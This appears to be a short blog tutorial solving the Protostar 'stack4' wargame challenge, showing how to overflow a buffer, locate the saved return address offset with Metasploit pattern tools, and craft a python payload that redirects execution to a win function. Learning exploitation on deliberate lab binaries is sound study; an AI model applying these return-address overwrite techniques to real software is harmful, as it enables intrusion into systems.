Hey again ,Today’s article is going to be short. So last time I solved stack3 , I’m back again and today I’m going to solve stack4 which is really interesting , it’s slightly different from stack3 but that difference is a new thing to see if we compare it to the previous challenges. So let’s not talk too much and jump right in.
Read my other articles about buffer overflow
Let’s take a look at the source code first :
Very simple ! it defines the
win function then defines the
main function which sets a buffer of 64 chars and stores our input in it. But wait a second where is the variable that we’re gonna overwrite ? in the previous challenges we had a variable that is being used by a function to change the code flow , now what will we overwrite ?
The answer is the
EIP which is the instruction pointer. And the instruction pointer is a memory address that holds the address of the next instruction in the program during execution. So if we overwrite that address the program will execute whatever that address refers to. let’s try to exceed the buffer.
python -c "print 'A' * 64"
The program didn’t even crash … why ? Because the return address is not directly after the buffer like in the previous challenges , Let’s try 100 chars
python -c "print 'A' * 100"
The program crashed , Let’s find where does it exactly crash like we did in the previous challenge read it if you haven’t done yet.
We will create a pattern with
./pattern_create.rb -l 100
Then we will pass it to the program in gdb
It crashes at
We locate that with pattern_offset
./pattern_offset.rb -q 63413563
We get exact match at offset 76
Next step is to find the address of
The address is
Now we can build our exploit :
python -c "print 'A' * 76 + '\xf4\x83\x04\x08'" | ./stack4
And we successfully changed the code flow !
Previous Binary Exploitation article : Buffer Overflow Examples, Overwriting a function pointer - protostar stack3
Next Binary Exploitation article : Buffer Overflow Examples, Code execution by shellcode injection - protostar stack5